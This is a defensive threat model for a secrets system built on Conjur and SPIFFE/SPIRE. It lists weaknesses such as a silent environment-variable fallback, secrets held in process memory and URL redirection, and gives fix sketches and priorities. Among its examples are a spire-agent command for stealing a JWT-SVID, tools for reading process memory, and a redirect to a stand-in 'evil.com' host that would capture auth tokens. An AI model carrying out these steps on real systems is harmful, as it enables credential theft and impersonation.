Secrets & Identity Threat Model
Honest assessment of what’s secure, what’s not, and what to fix.
The Catches
1. CATCH: Env Var Fallback = Silent Downgrade Attack
The problem:
When Conjur is unreachable or doesn’t have a variable, the ConjurBackend silently falls back to os.environ. An attacker who can kill the Conjur connection (network partition, DNS hijack, firewall rule) forces the app to read from env vars — which may be stale, compromised, or attacker-controlled.
```python
# conjur_backend.py line 104-108
env_val = os.environ.get(name)
if env_val is not None:
    logger.debug("secret_env_fallback", name=name)  # debug level: easy to miss
    return env_val
```
Impact: If an attacker sets env vars on the host (compromised container, malicious sidecar) AND blocks Conjur, the app uses the attacker’s values.
Fix needed: In production, the fallback should be configurable, with a fail-closed mode: if Conjur is configured but unreachable, refuse to return the secret instead of falling back. The fallback is currently logged at debug level, which hides it; it should be logged at warning at minimum.
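A minimal sketch of what a fail-closed lookup could look like. The `CONJUR_FAIL_CLOSED` name is taken from the fix list on this page; `resolve_secret`, `SecretUnavailableError`, and the `fetch_from_conjur` callable are hypothetical names used for illustration and are not the actual `ConjurBackend` API.

```python
import logging
import os
from typing import Callable, Optional

logger = logging.getLogger("secrets")


class SecretUnavailableError(RuntimeError):
    """Raised when a secret cannot be served under the current policy."""


def resolve_secret(name: str, fetch_from_conjur: Callable[[str], Optional[str]]) -> str:
    """Return a secret from Conjur, falling back to env only when allowed.

    `fetch_from_conjur` (hypothetical) returns the value, returns None if the
    variable does not exist, or raises if Conjur is unreachable.
    """
    fail_closed = os.environ.get("CONJUR_FAIL_CLOSED", "").lower() == "true"
    try:
        value = fetch_from_conjur(name)
    except Exception as exc:
        logger.warning("conjur_unreachable name=%s error=%s", name, exc)
        value = None
    if value is not None:
        return value
    if fail_closed:
        # Fail closed: never read a possibly attacker-controlled env var.
        raise SecretUnavailableError(f"{name}: Conjur unavailable and fallback disabled")
    env_val = os.environ.get(name)
    if env_val is None:
        raise SecretUnavailableError(f"{name}: not found in Conjur or environment")
    # Warning level, so a downgrade shows up in normal production logs.
    logger.warning("secret_env_fallback name=%s", name)
    return env_val
```

With the flag set, a blocked Conjur connection surfaces as an error at the call site rather than as a silent switch to environment values.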
2. CATCH: Secrets Live in Process Memory — Unprotected
The problem:
Every secret fetched from Conjur sits in a Python dict as a plain str. Python strings are immutable and cannot be zeroed out. They live in memory until garbage collected — which may be never for cached values.
```python
# conjur_backend.py: cache is a plain dict of plain strings
self._cache: dict[str, tuple[str, float]] = {}
# "sk-ant-api03-..." sits in heap memory, readable via:
# - /proc/PID/mem (root)
# - gcore PID (core dump)
# - ptrace (debugger attach)
# - memory forensics after container kill
```
Impact: Anyone with root on the host (or a container escape exploit) can read all cached secrets from process memory. A core dump (crash, OOM kill) writes them to disk.
Fix needed:
- Disable core dumps: `ulimit -c 0` or `prctl(PR_SET_DUMPABLE, 0)` at process start.
- The cache TTL limits the window (secrets expire from cache after 5 min), but during that window they’re in plaintext memory.
- Python cannot truly zero memory (strings are immutable). For the vault encryption key, `crypto.py` could use `mlock()` via ctypes to prevent swap, but this is hard in Python.
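Disabling core dumps from inside the process could look roughly like the sketch below. It assumes a POSIX host for `resource` and Linux for `prctl`; the function name `disable_core_dumps` is hypothetical, and where it would be called in TapPass startup is not specified here.

```python
import ctypes
import resource
import sys

PR_SET_DUMPABLE = 4  # constant from <linux/prctl.h>


def disable_core_dumps() -> None:
    """Prevent this process from writing core files; call once at startup."""
    # Equivalent of `ulimit -c 0`: soft and hard core size limits become zero.
    resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
    if sys.platform.startswith("linux"):
        # Also mark the process non-dumpable, which additionally blocks
        # ptrace attach from unprivileged processes.
        libc = ctypes.CDLL(None, use_errno=True)
        if libc.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0:
            raise OSError(ctypes.get_errno(), "prctl(PR_SET_DUMPABLE) failed")
```

This does not protect against root reading `/proc/PID/mem`; it only removes the crash-dump path and unprivileged debugger attach.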
3. CATCH: SPIRE Agent Socket = Root of Trust, But Who Guards It?
The problem:
The SPIFFE Workload API socket (/tmp/spire-agent/public/api.sock) is the root of trust. Any process that can open this socket can request a JWT-SVID and authenticate to Conjur as TapPass.
```bash
# If an attacker gets shell in the same pod or on the same node.
# The Workload API is gRPC over the Unix socket, so plain curl cannot call it;
# a gRPC client such as the spire-agent CLI can:
spire-agent api fetch jwt \
  -audience tappass \
  -socketPath /tmp/spire-agent/public/api.sock
# → Gets a valid JWT-SVID → authenticates to Conjur → reads all secrets
```
Impact: Container escape, compromised sidecar, or same-node lateral movement = full secret access.
Mitigation (SPIRE’s responsibility, not ours):
- SPIRE Agent uses kernel attestation (pid, uid, cgroups, K8s pod identity) to verify which workload is requesting the SVID.
- The socket should be mounted read-only into only the TapPass container (K8s volume mount with specific pod selector).
- SPIRE registration entries should be tight: only the specific pod service account + namespace + container image hash gets an SVID.
Our responsibility: Document this clearly. TapPass trusts SPIRE — if SPIRE is misconfigured (loose attestation policies), the whole chain falls apart.
4. CATCH: Conjur Admin Account = God Mode
The problem: Whoever has the Conjur admin API key can read every secret, modify policies, and impersonate any host. This is true for any centralized secrets manager.
Impact: If the Conjur admin credential is compromised, all secrets are compromised.
Mitigation:
- Conjur admin should use MFA (CyberArk PAM).
- Admin API key should be rotated and stored in a break-glass safe.
- Separation of duty: TapPass’s `host/tappass/server` identity has `read` only; it cannot modify policies or read secrets outside its policy scope.
5. CATCH: Resolver Auto-Detection Can Be Manipulated
The problem:
The resolver checks os.environ.get("CONJUR_APPLIANCE_URL") to decide which backend to use. If an attacker can set this env var (compromised Dockerfile, CI pipeline injection, K8s configmap edit), they can redirect all secret fetches to a malicious Conjur instance.
```python
if os.environ.get("CONJUR_APPLIANCE_URL"):
    backend = ConjurBackend()  # connects to whatever URL is in the env var
```
Impact: Attacker sets CONJUR_APPLIANCE_URL=https://evil.com → app sends auth tokens to evil.com → evil.com returns fake secrets → app uses attacker-controlled API keys.
Fix needed: In production, the Conjur URL should be validated against an allowlist or pinned in the deployment config (not just any env var). At minimum, the TLS certificate verification (CONJUR_SSL_CERT_PATH) should be mandatory in production — pinning the CA prevents connecting to a rogue server.
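One way the allowlist check might be sketched is shown below. The host name in `ALLOWED_CONJUR_HOSTS` and the function name `validate_conjur_url` are hypothetical; in a real deployment the allowlist would need to come from a source the attacker cannot edit alongside the env var (for example, baked into the image).

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; not taken from the TapPass codebase.
ALLOWED_CONJUR_HOSTS = frozenset({"conjur.internal.example.com"})


def validate_conjur_url(url: str, allowed_hosts=ALLOWED_CONJUR_HOSTS) -> str:
    """Return `url` unchanged if it is HTTPS and targets an allowlisted host."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError(f"Conjur URL must use https: {url!r}")
    if parts.username or parts.password:
        # Rejects tricks such as https://trusted-host@evil.com
        raise ValueError("Conjur URL must not contain credentials")
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        raise ValueError(f"Conjur host not in allowlist: {host!r}")
    return url
```

The resolver would call this on `CONJUR_APPLIANCE_URL` before constructing the backend. The check complements CA pinning rather than replacing it.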
6. CATCH: The 5-Minute Rotation Gap
The problem: When a secret is rotated in Conjur (e.g., a leaked API key), TapPass continues using the cached old value for up to 5 minutes (the TTL).
Impact: A 5-minute window where a compromised key is still in use, even after rotation.
Mitigation already in place: POST /admin/secrets/invalidate forces immediate cache flush. But this requires someone (or an automated system) to call it.
Fix needed: Conjur can send webhooks on secret rotation. TapPass should auto-register a webhook listener that calls invalidate() automatically — zero human intervention.
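The interaction between the TTL and an explicit invalidation can be illustrated with a small stand-in cache. `TTLSecretCache` and its `fetch` and `clock` parameters are hypothetical and only mirror the `dict[str, tuple[str, float]]` shape shown earlier; a webhook handler or the existing invalidate endpoint would call `invalidate()`.

```python
import threading
import time
from typing import Callable, Optional


class TTLSecretCache:
    """Cache secrets for `ttl_seconds`; `invalidate()` drops them immediately."""

    def __init__(
        self,
        fetch: Callable[[str], str],
        ttl_seconds: float = 300.0,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self._fetch = fetch
        self._ttl = ttl_seconds
        self._clock = clock
        self._lock = threading.Lock()
        self._cache: dict[str, tuple[str, float]] = {}  # name -> (value, expiry)

    def get(self, name: str) -> str:
        with self._lock:
            now = self._clock()
            hit = self._cache.get(name)
            if hit is not None and now < hit[1]:
                return hit[0]
            value = self._fetch(name)
            self._cache[name] = (value, now + self._ttl)
            return value

    def invalidate(self, name: Optional[str] = None) -> None:
        """Drop one entry, or the whole cache when `name` is None."""
        with self._lock:
            if name is None:
                self._cache.clear()
            else:
                self._cache.pop(name, None)
```

Without the `invalidate()` call, a rotated secret stays in use until its expiry timestamp passes; with it, the next `get()` goes back to the source.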
7. CATCH: No Mutual TLS to Conjur
The problem: TapPass authenticates to Conjur via JWT (SPIFFE) over one-way TLS. The Conjur server is verified via its certificate, but Conjur doesn’t verify the TLS client certificate. The authentication is at the application layer (JWT in POST body), not at the transport layer.
With mTLS, even if an attacker intercepts the JWT-SVID, they can’t replay it because they don’t hold the private key for the TLS client certificate.
Fix possible: Use the SPIFFE X509-SVID (which TapPass already has from SPIRE) as the TLS client cert when connecting to Conjur. httpx supports cert=(cert_file, key_file). This adds transport-layer authentication on top of JWT application-layer authentication.
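A rough sketch of how the client options might be assembled. It assumes the X509-SVID and its key have been written to files (for example by a SPIFFE helper process); the function name `conjur_mtls_kwargs` and its path parameters are hypothetical.

```python
from pathlib import Path


def conjur_mtls_kwargs(ca_path: str, svid_cert_path: str, svid_key_path: str) -> dict:
    """Build keyword arguments for an httpx client that presents the X509-SVID."""
    required = (
        ("CA bundle", ca_path),
        ("SVID certificate", svid_cert_path),
        ("SVID key", svid_key_path),
    )
    for label, path in required:
        # Fail early instead of silently connecting without a client cert.
        if not Path(path).is_file():
            raise FileNotFoundError(f"{label} not found: {path}")
    return {
        "verify": ca_path,  # pin the CA that signed the Conjur server cert
        "cert": (svid_cert_path, svid_key_path),  # client cert for mTLS
    }
```

The result would be passed as `httpx.Client(**conjur_mtls_kwargs(...))`. Because SVIDs are short-lived, the client would need to be rebuilt when the files rotate, and the Conjur side (or a proxy in front of it) would have to be configured to require and verify client certificates for this to add protection.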
What IS Solid
| Layer | Status | Why |
|---|---|---|
| No secrets in code/config/env | ✅ | 129 callsites go through protocol. Only Conjur connection coordinates in env (not secrets). |
| Automatic rotation pickup | ✅ | TTL cache + invalidation endpoint. No restart needed. |
| Audit trail | ✅ | Conjur logs every secret read with host identity, timestamp, result. |
| No static credential for Conjur auth | ✅ | SPIFFE JWT-SVID from SPIRE. Auto-rotated every 5 min. No API key in production. |
| SPIFFE identity reuse | ✅ | Same SPIRE infrastructure for agent auth AND Conjur auth. Single identity system. |
| Protocol is open | ✅ | Backend is swappable. Conjur today, Vault tomorrow. No lock-in. |
| TLS to Conjur | ✅ | httpx verifies server cert. Never verify=False. CA pinning via CONJUR_SSL_CERT_PATH. |
| Thread safety | ✅ | Single lock protects cache + auth token. All Conjur I/O serialized. |
Prioritized Fix List
| # | Issue | Severity | Effort | Fix |
|---|---|---|---|---|
| 1 | Env fallback in production is silent downgrade | High | Small | Add CONJUR_FAIL_CLOSED=true mode. Log fallbacks at warning not debug. |
| 2 | Conjur URL can be redirected via env var | High | Small | Mandatory CONJUR_SSL_CERT_PATH in production. Validate URL against allowlist. |
| 3 | Core dumps contain secrets in memory | Medium | Small | Disable core dumps at process start. Set RLIMIT_CORE=0. |
| 4 | No mTLS to Conjur | Medium | Medium | Use X509-SVID as httpx client cert for Conjur connections. |
| 5 | 5-min rotation gap | Low | Medium | Conjur webhook → auto-invalidate. |
| 6 | SPIRE socket access = root of trust | Low (SPIRE’s job) | N/A | Document attestation requirements. |
| 7 | Memory secrets can’t be zeroed (Python) | Low | N/A | Language limitation. TTL cache limits window. |